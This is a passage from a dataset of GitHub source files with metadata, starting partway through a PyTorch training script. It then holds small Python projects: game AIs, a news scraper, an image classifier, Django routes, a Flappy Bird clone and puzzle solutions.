type=str)\r\n parser.add_argument('--test', default=False, type=bool)\r\n parser.add_argument('--train_1', default=False, type=bool)\r\n parser.add_argument('--train_2', default=True, type=bool)\r\n parser.add_argument('--num_epoch', default=5000, type=int,\r\n help='Epoch number for training')\r\n parser.add_argument('--batch_size', default=1, type=int)\r\n parser.add_argument('--weight_folder_1', default='.\\\\weights_1', type=str)\r\n parser.add_argument('--weight_folder_2', default='.\\\\weights_2', type=str)\r\n parser.add_argument('--gpu', default=0, type=int,\r\n help='GPU id to use. If you want to use only CPU, set None.')\r\n parser.add_argument('--optim', default='AdamW', type=str,\r\n help='SGD or Adam or AdamW')\r\n parser.add_argument('--lr', '--learning-rate', default=1e-4, type=float,\r\n help='initial learning rate')\r\n parser.add_argument('--momentum', default=0.9, type=float,\r\n help='Momentum value for optim')\r\n parser.add_argument('--weight_decay', default=1e-4, type=float,\r\n help='Weight decay for SGD')\r\n parser.add_argument('--grad_accumulation_steps', default=1, type=int,\r\n help='Number of gradient accumulation steps')\r\n parser.add_argument('--equation_find', default=False, type=bool)\r\n parser.add_argument('--xyplot', default=True, type=bool)\r\n parser.add_argument('--patch_show', default=False, type=bool)\r\n parser.add_argument('--lineplot', default=False, type=bool)\r\n args = parser.parse_args()\r\n return args\r\n\r\ndef main(args):\r\n ### Data parsing ###\r\n print('data loading...')\r\n\r\n dataset = ScrewholeDataset(args.image_path)\r\n data_loader = DataLoader(dataset, batch_size=args.batch_size,\r\n shuffle = True,\r\n drop_last = False)\r\n print('data loaded.')\r\n \r\n \r\n # Load model, optimizer, scheduler, checkpoint\r\n model_1, model_2 = get_model(args)\r\n \r\n checkpoint_1, checkpoint_2, args = weight_load(args)\r\n\r\n\r\n if len(checkpoint_1) != 0:\r\n model_1.load_state_dict(checkpoint_1['state_dict'])\r\n #print('###### model architecture #######')\r\n #print(model)\r\n del checkpoint_1\r\n if len(checkpoint_2) != 0:\r\n model_2.load_state_dict(checkpoint_2['state_dict'])\r\n del checkpoint_2\r\n\r\n if args.gpu is not None:\r\n print('Use GPU: {}'.format(args.gpu))\r\n torch.cuda.set_device(args.gpu)\r\n model_1.cuda(args.gpu)\r\n model_2.cuda(args.gpu)\r\n\r\n iters_per_epoch = int(len(dataset)/args.batch_size)\r\n if args.xyplot:\r\n xy_plot(data_loader,model_1,iters_per_epoch, args)\r\n if args.lineplot:\r\n line_plot(data_loader,model_1, model_2, iters_per_epoch, args)\r\n \r\n if args.train_1:\r\n optimizer_1 = get_optimizer(args, model_1)\r\n scheduler_1 = get_scheduler(args, optimizer_1)\r\n for epoch in range(args.start_epoch, args.num_epoch):\r\n \r\n loss = train_1(data_loader, model_1, scheduler_1, optimizer_1, epoch, args, iters_per_epoch)\r\n if (epoch + 1) % 5 == 0:\r\n pass #validation is not developed yet\r\n state = {\r\n 'epoch': epoch,\r\n 'parser': args,\r\n 'state_dict':get_state_dict(model_1)\r\n }\r\n torch.save(\r\n state,\r\n os.path.join(\r\n args.weight_folder_1,\r\n \"checkpoint_{}.pth\".format(epoch)\r\n )\r\n )\r\n \r\n elif args.train_2:\r\n optimizer_2 = get_optimizer(args, model_2)\r\n scheduler_2 = get_scheduler(args, optimizer_2)\r\n for epoch in range(args.start_epoch, args.num_epoch):\r\n loss = train_2(data_loader, model_1, model_2, scheduler_2, optimizer_2, epoch, args, iters_per_epoch)\r\n if (epoch + 1) % 3 == 0:\r\n pass #validation is not developed yet\r\n state = {\r\n 'epoch': 
epoch,\r\n 'parser': args,\r\n 'state_dict':get_state_dict(model_2)\r\n }\r\n torch.save(\r\n state,\r\n os.path.join(\r\n args.weight_folder_2,\r\n \"checkpoint_{}.pth\".format(epoch)\r\n )\r\n )\r\n else:\r\n pass #test is not developed yet\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Finding normal vector equations in screw hole images')\r\n args = argparser(parser) #set argument\r\n torch.cuda.empty_cache()\r\n\r\n if(not os.path.exists(args.weight_folder_1)):\r\n os.makedirs(args.weight_folder_1)\r\n if(not os.path.exists(args.weight_folder_2)):\r\n os.makedirs(args.weight_folder_2)\r\n print('start epoch: {}'.format(args.start_epoch))\r\n print('total epoch: {}'.format(args.num_epoch))\r\n print('batch size: {}'.format(args.batch_size))\r\n main(args)","repo_name":"hwarangkim/20220619-Volt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"26629542994","text":"valores = list()\nlista_par = list()\nlista_impar = list()\nwhile True:\n n = int(input('Enter a number: '))\n if n not in valores:\n valores.append(n)\n if n % 2 == 0:\n lista_par.append(n)\n else:\n lista_impar.append(n)\n resp = str(input('Do you want to continue? [Y/N] '))\n if resp in \"Nn\":\n break\n\nprint(f'The complete list is {valores}')\nprint(f'The list of even numbers is {lista_par}')\nprint(f'The list of odd numbers is {lista_impar}')","repo_name":"christianmesaque/Python_Exercicios-","sub_path":"Mundo 3/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"74922381866","text":"from typing import List\nfrom multiprocessing import Value\n\nfrom chillow.service.ai.search_tree_node import SearchTreeRoot\nfrom chillow.service.ai.artificial_intelligence import ArtificialIntelligence\nfrom chillow.model.action import Action\nfrom chillow.model.game import Game\nfrom chillow.model.player import Player\n\n\nclass SearchTreeAI(ArtificialIntelligence):\n \"\"\"The SearchTreeAI tries to create a tree by simulating different actions for all players for the next rounds.\n\n If there is an initial action that lets the player survive for the next rounds, regardless of which actions\n the other players make, this action will be chosen.\n\n Attributes:\n player: The player associated with this AI.\n \"\"\"\n\n def __init__(self, player: Player, depth: int, max_speed: int = 10, randomize: bool = False,\n distance_to_check: int = 0):\n \"\"\" Creates a new object of the SearchTreeAI.\n\n Args:\n player: The player assigned to the AI.\n depth: Depth for pre-calculating actions.\n max_speed: The maximum speed the AI can reach.\n randomize: Indicating whether to calculate actions in the tree in random order.\n distance_to_check:\n Maximum distance an enemy player may be away to still be taken into\n account in the calculations.\n \"\"\"\n\n super().__init__(player, max_speed)\n self.__depth = depth\n self.__randomize = randomize\n self.__distance_to_check = distance_to_check\n\n def get_information(self) -> str:\n \"\"\"See base class.\"\"\"\n return (super().get_information() +\n \", depth=\" + str(self.__depth) +\n \", randomize=\" + str(self.__randomize) +\n \", distance_to_check=\" + str(self.__distance_to_check))\n\n def create_next_action(self, game: Game, return_value: Value):\n \"\"\"See base class.\"\"\"\n
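# Editor's note (comments added for clarity, not from the original repository):\n # return_value is a shared multiprocessing.Value; the chosen action's index is\n # written into it below, so a supervising process can read the latest decision\n # even if the move deadline cuts the calculation short.\n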
self._turn_ctr += 1\n\n root = SearchTreeRoot(game.copy())\n player_ids_to_watch = game.get_other_player_ids(self.player, self.__distance_to_check, True)\n combinations = Action.get_combinations(len(player_ids_to_watch))\n\n action = root.calculate_action(self.player, player_ids_to_watch, combinations, self.__depth, self._turn_ctr,\n True, [], self._max_speed, self.__randomize)\n return_value.value = (action if action is not None else Action.get_random_action()).get_index()\n\n def create_all_next_surviving_actions(self, game: Game) -> List[Action]:\n \"\"\"Calculates not only one but all actions that will let the player survive for the next rounds.\n\n Args:\n game: The current state of the game.\n\n Returns:\n A list of actions which will let the player survive for the next rounds.\n \"\"\"\n\n root = SearchTreeRoot(game.copy())\n player_ids_to_watch = game.get_other_player_ids(self.player, self.__distance_to_check, True)\n combinations = Action.get_combinations(len(player_ids_to_watch))\n\n search_tree_actions = []\n\n for action in Action.get_actions():\n if root.calculate_action(self.player, player_ids_to_watch, combinations, self.__depth, self._turn_ctr, True,\n [action], self._max_speed, True) is not None:\n search_tree_actions.append(action)\n\n return search_tree_actions\n\n def _get_depth(self) -> int:\n return self.__depth\n\n def _get_distance_to_check(self) -> int:\n return self.__distance_to_check\n","repo_name":"jonashellmann/informaticup21-team-chillow","sub_path":"chillow/service/ai/search_tree_ai.py","file_name":"search_tree_ai.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"44016930805","text":"import hashlib\n\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\n\nfrom database.dbExecutor import dbExecutor\nimport sys\n\n\nNUM_PAGES_TO_CHECK = 1\nfirstRunBool = False\nmeseci = {'januar': '1.', 'februar': '2.', 'marec': '3.', 'april': '4.', 'maj': '5.',\n 'junij': '6.', 'julij': '7.', 'avgust': '8.', 'september': '9.',\n'oktober': '10.', 'november': '11.', 'december': '12.'}\n\n\ndef makeHash(articleTitle, dateStr):\n hash_object = hashlib.sha1((articleTitle+dateStr).encode(\"utf-8\"))\n\n return hash_object.hexdigest()\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n\n print(e)\n\n\nclanki = []\nparent_link = (\"https://www.rtvslo.si\")\n\ndef uniformDateStr(dateStr, inputDateFromat=\"\"):\n if inputDateFromat == \"\":\n inputDateFromat = \"%d.%m.%Y\"\n return datetime.datetime.strptime(dateStr, inputDateFromat).strftime(\"%Y-%m-%d\")\n\n\n\n\n\ndef get_text(stran,SOURCE_ID):\n sqlBase = dbExecutor() # creates a sql database handler class\n 
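# Editor's note (comment added for clarity, not from the original scraper):\n # fetch one page of the archive listing, then parse each linked article and\n # insert it only if its hash is not yet in the database.\n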
todayDateStr = datetime.datetime.now().strftime(\"%Y-%m-%d\") # today date in the uniform format\n soup = BeautifulSoup(simple_get(\"https://www.rtvslo.si/lokalne-novice/ljubljana/arhiv/?&page=\"+str(stran)), \"html.parser\")\n all_links = soup.find_all(\"a\",{\"class\":\"title\"})\n prev_link = \"\"\n for links in all_links:\n if(prev_link == links): continue\n prev_link = links\n if(links.get(\"href\")==None): continue\n if(not re.match(\"http://+\",links.get(\"href\"))):\n #print(\"----------------------\")\n print(parent_link+links.get(\"href\"))\n soup = BeautifulSoup(simple_get(parent_link+links.get(\"href\")), \"html.parser\")\n tmp = soup.find(\"div\", {\"id\":\"newsbody\"})\n if(tmp == None): continue\n naslov = str(tmp.find(\"h1\").text)\n vse = tmp.find_all(\"p\")\n vsebina=\"\"\n\n for obj in vse:\n vsebina+=str(obj.text)+\"\\n\"\n dat = str(tmp.find(\"div\", {\"class\":\"info\"}).text)\n dat= dat.split()\n s=\"\"\n seq = (dat[0], meseci[dat[1]], dat[2])\n datum = uniformDateStr(s.join(seq))\n link = parent_link+links.get(\"href\")\n hashStr = makeHash(naslov, datum) # creates article hash from title and dateStr (HASH_VREDNOST)\n date_downloaded = todayDateStr # date when the article was downloaded\n\n if sqlBase.getByHash(hashStr) is None:\n # get article description/content\n description = vsebina\n # (date_created: string, caption: string, contents: string, date: string, hash: string, url: string, source: string)\n entry = (datum, naslov, description, date_downloaded, hashStr, link, SOURCE_ID)\n sqlBase.insertOne(entry) # insert the article in the database\n print(\"Inserted successfully\")\n\n\n\ndef get_articles( SOURCE_ID):\n stevilka_strani = 1\n now = datetime.datetime.now()\n get_text(stevilka_strani, SOURCE_ID)\n pagesChecked = 1\n while True:\n pagesChecked += 1\n print(stevilka_strani)\n stevilka_strani+=1\n get_text(stevilka_strani,SOURCE_ID)\n if not firstRunBool and pagesChecked >= NUM_PAGES_TO_CHECK:\n break\n\ndef main():\n get_articles(\"RTV-Ljubljana\")\n\n\nif __name__ == '__main__':\n # checks if the second argument is provided and is equal to \"-F\" - means first run\n if len(sys.argv) == 2 and sys.argv[1] == \"-F\":\n firstRunBool = True\n\n print (\"Add -F as the command line argument to execute first run command - downloads the whole history of articles from the page.\")\n\n main()","repo_name":"jurem/SLEDIMedO","sub_path":"scrapers/SCRAPER-RTV-Ljubljana.py","file_name":"SCRAPER-RTV-Ljubljana.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"5933172576","text":"import torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport numpy as np\nimport time\nimport os\nimport pretrainedmodels\nimport torch.optim as optim\nfrom dataset import GarbageDataset\nfrom utils import Bar, Logger, AverageMeter, accuracy, savefig, get_optimizer, save_checkpoint, save_model\nfrom train_utils import train, test\nfrom nets import se_resnext101_32x4d\nfrom ops import FocalLoss\nfrom transform import get_train_transform\nfrom torch.utils.data import DataLoader\n# from torch.utils.tensorboard import SummaryWriter\n\nbest_acc = 0\nstart_epoch = 0\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\nnum_class = 40\nbatch_size = 256\ntot_epoch = 30\nlr = 1e-3\n\n# model\npretrainedmodel = 'se_resnext101_32x4d'\npretrainedmodel_path = 
'./pretrain_models/se_resnext101_32x4d-3b2fe3d8.pth'\nmodel, train_layers = se_resnext101_32x4d(40, pretrainedmodel_path)\nmodel.to(device)\noptimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr)\n# criterion = FocalLoss(num_class).to(device)\ncriterion = nn.CrossEntropyLoss().to(device)\n# lr_scheduler = None\nlr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, patience=4, verbose=False)\n\n# ------------- Dataset ---------------\nclasses = (\n '其他垃圾/一次性快餐盒', '其他垃圾/污损塑料', '其他垃圾/烟蒂', '其他垃圾/牙签',\n '其他垃圾/破碎花盆及碟碗', '其他垃圾/竹筷',\n '厨余垃圾/剩饭剩菜', '厨余垃圾/大骨头', '厨余垃圾/水果果皮', '厨余垃圾/水果果肉',\n '厨余垃圾/茶叶渣', '厨余垃圾/菜叶菜根','厨余垃圾/蛋壳','厨余垃圾/鱼骨',\n '可回收物/充电宝','可回收物/包','可回收物/化妆品瓶','可回收物/塑料玩具',\n '可回收物/塑料碗盆','可回收物/塑料衣架',\n '可回收物/快递纸袋','可回收物/插头电线','可回收物/旧衣服',\n '可回收物/易拉罐','可回收物/枕头','可回收物/毛绒玩具','可回收物/洗发水瓶',\n '可回收物/玻璃杯','可回收物/皮鞋','可回收物/砧板','可回收物/纸板箱',\n '可回收物/调料瓶','可回收物/酒瓶','可回收物/金属食品罐','可回收物/锅',\n '可回收物/食用油桶','可回收物/饮料瓶',\n '有害垃圾/干电池','有害垃圾/软膏','有害垃圾/过期药物'\n)\nmean, std = [0.4995, 0.4642, 0.4140], [0.2771, 0.2705, 0.2660]\ntrain_dataset = GarbageDataset(\n './garbage_dataset_v1/train', \n './garbage_dataset_v1/train.csv', \n transforms=get_train_transform(mean, std, 224)\n)\nval_dataset = GarbageDataset(\n './garbage_dataset_v1/val', \n './garbage_dataset_v1/val.csv', \n transforms=get_train_transform(mean, std, 224)\n)\n\ntrain_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=8)\nval_dataloader = DataLoader(val_dataset, batch_size=batch_size, shuffle=False, num_workers=8)\n# ------------- ---------------\nwriter = None # the server's PyTorch version is too old for tensorboard\n# load train params -------------\ntitle = pretrainedmodel\n# resume = None\ncheckpoint_path = './saves'\nlogger = Logger(os.path.join(checkpoint_path, 'log.txt'), title=title)\nlogger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.', 'Valid Acc.'])\n# if resume:\n# print('==> Resuming from checkpoint')\n# assert os.path.isfile(resume), 'Error no checkpoint file'\n# checkpoint_dir = os.path.dirname(resume)\n# checkpoint = torch.load(resume)\n# best_acc = checkpoint['best_acc']\n# start_epoch = checkpoint['epoch']\n# model.load_state_dict(checkpoint['state_dict'])\n# optimizer.load_state_dict(checkpoint['optimizer'])\n# logger = Logger(os.path.join(checkpoint_dir, 'log.txt'), title=title, resume=True)\n# else:\n# logger = Logger(os.path.join(checkpoint_path, 'log.txt'), title=title)\n# logger.set_names(['Learning Rate', 'Train Loss', 'Valid Loss', 'Train Acc.', 'Valid Acc.'])\n\n\n# train ------------\nfor epoch in range(start_epoch, tot_epoch):\n print('\\nEpoch [%d | %d] LR: %f' % (epoch + 1, tot_epoch, optimizer.param_groups[0]['lr']))\n \n train_loss, train_acc, train_5 = train(train_dataloader, model, criterion, optimizer, epoch, device, writer)\n test_loss, test_acc, test_5 = test(val_dataloader, model, criterion, epoch, device, writer)\n\n # logger.append([ lr, train_loss, test_loss, train_acc, test_acc ])\n print('train_loss:%f, val_loss:%f, train_acc:%f, train_5:%f, val_acc:%f, val_5:%f' % (train_loss, test_loss, train_acc, train_5, test_acc, test_5))\n\n is_best = test_acc > best_acc\n best_acc = max(test_acc, best_acc)\n\n save_checkpoint({\n 'fold': 1,\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'train_acc': train_acc,\n 'acc': test_acc,\n 'best_acc': best_acc,\n 'optimizer': optimizer.state_dict(),\n }, is_best, single=False, checkpoint=checkpoint_path, filename='test')\n\n if lr_scheduler is not None:\n
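# Editor's note (comment added for clarity): ReduceLROnPlateau is stepped with\n # the metric it monitors, here the validation loss.\n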
lr_scheduler.step(test_loss)\n\nlogger.close()\nlogger.plot()\nsavefig(os.path.join(checkpoint_path, 'log.eps'))\nprint('Best Acc:{}'.format(best_acc))\n","repo_name":"x670783915/huaweiyun_garbage_classify__learning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"21796551646","text":"def traverse(ast, visitor):\n def traverseArray(array, parent):\n for child in array:\n traverseNode(child, parent)\n\n def traverseNode(node, parent):\n entryFunction = visitor.get(node[\"type\"])\n\n if entryFunction:\n # Call enter function\n entryFunction(node, parent)\n\n if (node[\"type\"] == 'Program'):\n traverseArray(node[\"body\"], node)\n elif (node[\"type\"] == 'CallExpression'):\n traverseArray(node[\"params\"], node)\n elif (node[\"type\"] == 'NumberLiteral' or node[\"type\"] == 'StringLiteral'):\n return\n \n traverseNode(ast, None)\n","repo_name":"DennisPlaydon/tiny-compiler-python","sub_path":"traverser.py","file_name":"traverser.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"1680306629","text":"from typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from data_fast_insights import BinaryDependenceModelData\n\n\ndef choose_central_tendency_metric(col_name: str, model_data: 'BinaryDependenceModelData'):\n if col_name == model_data.y_name or col_name in model_data.num_cols:\n use_metrics = 'mean'\n elif col_name in model_data.cat_cols:\n use_metrics = 'mode'\n else:\n raise ValueError('col_name not found in num_cols or cat_cols of model_data')\n return use_metrics\n","repo_name":"xsolla/data-fast-insights","sub_path":"data_fast_insights/utils/calc_utils.py","file_name":"calc_utils.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"20346579780","text":"from django.contrib import admin\nfrom django.urls import path, re_path\nfrom first import views\nfrom .views import *\n\n\n\nurlpatterns = [\n path('example', example.foo),\n\n path('documents/upload', views.upload, name=\"file_upload\"),\n\n path('documents', documents.document_list, name=\"document_list\"),\n path('documents/add', documents.document_add, name=\"document_add\"),\n path('documents/<int:pk>', documents.document_view, name=\"document_view\"),\n path('documents/<int:pk>/change', documents.document_change, name=\"document_change\"),\n\n path('sentences', sentences.sentence_list),\n path('sentences/add', sentences.sentence_add),\n path('sentences/<int:pk>', sentences.sentence_view),\n path('sentences/<int:pk>/change', sentences.sentence_change),\n\n path('clauses', clauses.clause_list),\n path('clauses/add', clauses.clause_add),\n path('clauses/<int:pk>', clauses.clause_view),\n path('clauses/<int:pk>/change', clauses.clause_change),\n\n\n path('syntaxemes', syntaxemes.syntaxeme_list),\n path('syntaxemes/add', syntaxemes.syntaxeme_add),\n path('syntaxemes/<int:pk>', syntaxemes.syntaxeme_view),\n path('syntaxemes/<int:pk>/change', syntaxemes.syntaxeme_change),\n\n path('wordforms', wordforms.wordform_list),\n path('wordforms/add', wordforms.wordform_add),\n path('wordforms/<int:pk>', wordforms.wordform_view),\n path('wordforms/<int:pk>/change', 
wordforms.wordform_change),\n\n]","repo_name":"useribraim/django","sub_path":"first/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18486886096","text":"##Project : Flappy Bird Game , Balla Prem Nikhil\n\nfrom typing import Tuple\nimport pygame\nfrom pygame.locals import * \nimport random\n\npygame.init()\nclock = pygame.time.Clock()\nwhite = (255, 255, 255)\nfps = 60\nscreen_width = 675\nscreen_height = 732\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('Flappy Bird')\n#font (is included in the folder, double click and install)\nfont = pygame.font.SysFont('04B_19', 30)\n\n\n\n#Game Variables\nground_scroll = 0\nscroll_speed = 4 \nflying = False\ngame_over = False\npipe_gap = 250\npipe_frequency = 1200 # milliseconds\nlast_pipe = pygame.time.get_ticks() - pipe_frequency\nscore = 0\ntop_score = 0\npass_pipe = False\n\n#Images\nbg = pygame.image.load('game_assets/background.png')\nground_img = pygame.image.load('game_assets/floor.png')\nbutton_img = pygame.image.load('game_assets/restart.png')\n\n#Definitions\n\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\ndef reset_game():\n pipe_group.empty()\n flappy.rect.x = 100\n flappy.rect.y = int(screen_height / 2)\n score = 0\n return score\n\n#Classes\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.images = []\n self.index = 0\n self.count = 0\n for num in range(1, 4):\n img = pygame.image.load(f'game_assets/bird{num}.png')\n self.images.append(img)\n self.image = self.images[self.index]\n self.rect = self.image.get_rect()\n self.rect.center = [x, y]\n self.vel = 0\n self.clicked = False\n\n def update(self):\n\n if flying == True:\n #Gravity\n self.vel += 0.5\n if self.vel > 6.25:\n self.vel = 6.25\n if self.rect.bottom < 600:\n self.rect.y += int(self.vel)\n\n if game_over == False:\n #Jumping\n keys=pygame.key.get_pressed()\n if pygame.mouse.get_pressed()[0] == 1 or keys[K_SPACE] == 1:\n if self.clicked == False:\n self.vel = -7.8\n self.clicked = True\n if pygame.mouse.get_pressed()[0] == 0 or keys[K_SPACE] == 0:\n self.clicked = False\n\n #Animation\n self.count += 1\n flap_cooldown = 5\n\n if self.count > flap_cooldown:\n self.count = 0\n self.index += 1\n if self.index >= len(self.images):\n self.index = 0\n self.image = self.images[self.index]\n\n #Rotating bird\n self.image = pygame.transform.rotate(self.images[self.index], (-2) * self.vel)\n else:\n self.image = pygame.transform.rotate(self.images[self.index], -90)\n\nclass Pipe(pygame.sprite.Sprite):\n def __init__(self, x, y, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('game_assets/pipe.png')\n self.rect = self.image.get_rect()\n #position 1 is from top, -1 is from bottom\n if position == 1:\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect.bottomleft = [x, y - int(pipe_gap / 2)]\n if position == -1:\n self.rect.topleft = [x, y + int(pipe_gap / 2)]\n\n def update(self):\n self.rect.x -= scroll_speed\n if self.rect.right < 0:\n self.kill()\n\nclass Button():\n def __init__(self, x, y, image):\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.topleft = (x, y)\n\n def draw(self):\n\n action = False\n\n #Getting position of mouse\n mpos = pygame.mouse.get_pos()\n\n #Checking if mouse hovered over 
button\n if self.rect.collidepoint(mpos):\n if pygame.mouse.get_pressed()[0] == 1:\n action = True\n\n #Space bar click check\n keys = pygame.key.get_pressed()\n if keys[K_SPACE] == 1:\n action = True\n\n #Draw\n screen.blit(self.image, (self.rect.x, self.rect.y))\n\n return action\n\nbird_group = pygame.sprite.Group()\npipe_group = pygame.sprite.Group()\n\nflappy = Bird(100, int(screen_height / 2))\nbird_group.add(flappy)\n\n#Restart Button\nbutton = Button(screen_width // 2 - 50, screen_height // 2 - 100, button_img)\n\nrun = True\nwhile run:\n\n clock.tick(fps)\n\n screen.blit(bg, (0, 0))\n\n bird_group.draw(screen)\n bird_group.update()\n pipe_group.draw(screen)\n\n #Drawing Ground\n screen.blit(ground_img, (ground_scroll, 600))\n\n #Score\n if len(pipe_group) > 0:\n if bird_group.sprites()[0].rect.left > pipe_group.sprites()[0].rect.left\\\n and bird_group.sprites()[0].rect.right < pipe_group.sprites()[0].rect.right\\\n and pass_pipe == False:\n pass_pipe = True\n if pass_pipe == True:\n if bird_group.sprites()[0].rect.left > pipe_group.sprites()[0].rect.right:\n score += 5\n pass_pipe = False\n draw_text(\"Score:\", font, white, int(100), 10) \n draw_text(str(score), font, white, int(200), 10)\n draw_text(\"Best Score:\", font, white, int(screen_width - 200), 10)\n draw_text(str(top_score), font, white, int(screen_width - 50), 10)\n\n #Collision Check\n if pygame.sprite.groupcollide(bird_group, pipe_group, False, False) or flappy.rect.top < 0:\n game_over = True\n\n #Checking game over\n if flappy.rect.bottom > 600:\n game_over = True\n flying = False\n\n\n if game_over == False and flying == True:\n\n #Pipe Generation\n time_now = pygame.time.get_ticks()\n if time_now - last_pipe > pipe_frequency:\n pipe_height = random.randint(-80, 80)\n btm_pipe = Pipe(screen_width, int(screen_height / 2) + pipe_height, -1)\n top_pipe = Pipe(screen_width, int(screen_height / 2) + pipe_height, 1)\n pipe_group.add(btm_pipe)\n pipe_group.add(top_pipe)\n last_pipe = time_now\n\n pipe_group.update()\n\n #Ground sliding\n ground_scroll -= scroll_speed\n if abs(ground_scroll) > 35:\n ground_scroll = 0\n\n #Resetting\n if game_over == True:\n if button.draw() == True:\n game_over = False\n if score > top_score:\n top_score = score\n score = reset_game()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n keys=pygame.key.get_pressed()\n if event.type == pygame.MOUSEBUTTONDOWN or keys[K_SPACE] == 1: \n if flying == False and game_over == False:\n flying = True\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"PremNikhil/flappy","sub_path":"prem.py","file_name":"prem.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9706930380","text":"import numpy as np\n\ndef part1():\n with open(\"day03.txt\") as f:\n a = f.read().split(\"\\n\")\n columsums = [sum([int(row[i]) for row in a]) for i in range(len(a[0]))]\n\n ma = \"\".join([str(int(colum < len(a)//2)) for colum in columsums])\n mi = \"\".join([str(int(colum > len(a)//2)) for colum in columsums])\n print(int(ma, base=2) * int(mi, base=2))\n\n\ndef part2():\n with open(\"day03.txt\") as f:\n a = f.read().split(\"\\n\")\n\n arr = np.array([list(map(int, line)) for line in a])\n\n ox = np.ones(len(arr), dtype=bool)\n co = np.ones(len(arr), dtype=bool)\n\n for i in range(len(a[0])):\n max_ox = (np.sum(arr[ox][:, i]) >= (np.sum(ox) + 1) // 2)\n min_co = (np.sum(arr[co][:, i]) < (np.sum(co) + 1) // 2)\n\n if 
sum(ox) > 1:\n ox &= arr[:, i] == max_ox\n if sum(co) > 1:\n co &= arr[:, i] == min_co\n\n ox_val = \"\".join(list(map(str, arr[ox][0])))\n co_val = \"\".join(list(map(str, arr[co][0])))\n\n print(int(ox_val, base=2) * int(co_val, base=2))\n\npart1()\npart2()","repo_name":"thatGuySpectre/AdventOfCode","sub_path":"2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73884220268","text":"\"\"\"\nGiven an unsorted array of integers nums,\nreturn the length of the longest continuous increasing subsequence (i.e. subarray).\nThe subsequence must be strictly increasing.\n\nA continuous increasing subsequence is defined by two indices l and r (l < r)\nsuch that it is [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]]\nand for each l <= i < r, nums[i] < nums[i + 1].\n\nExample 1:\n\nInput: nums = [1,3,5,4,7]\nOutput: 3\nExplanation: The longest continuous increasing subsequence is [1,3,5] with length 3.\nEven though [1,3,5,7] is an increasing subsequence,\nit is not continuous as elements 5 and 7 are separated by element 4.\n\"\"\"\n\nclass Solution:\n def findLengthOfLCIS(self, nums):\n left = 0\n max_length = 0\n\n while left < len(nums):\n right = left + 1\n while right < len(nums) and nums[right] > nums[right - 1]:\n right += 1\n max_length = max(max_length, right - left)\n left = right\n\n return max_length\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findLengthOfLCIS([1,3,5,4,7]))","repo_name":"Invalid-coder/Data-Structures-and-algorithms","sub_path":"Arrays/Tasks/leetcode(674).py","file_name":"leetcode(674).py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
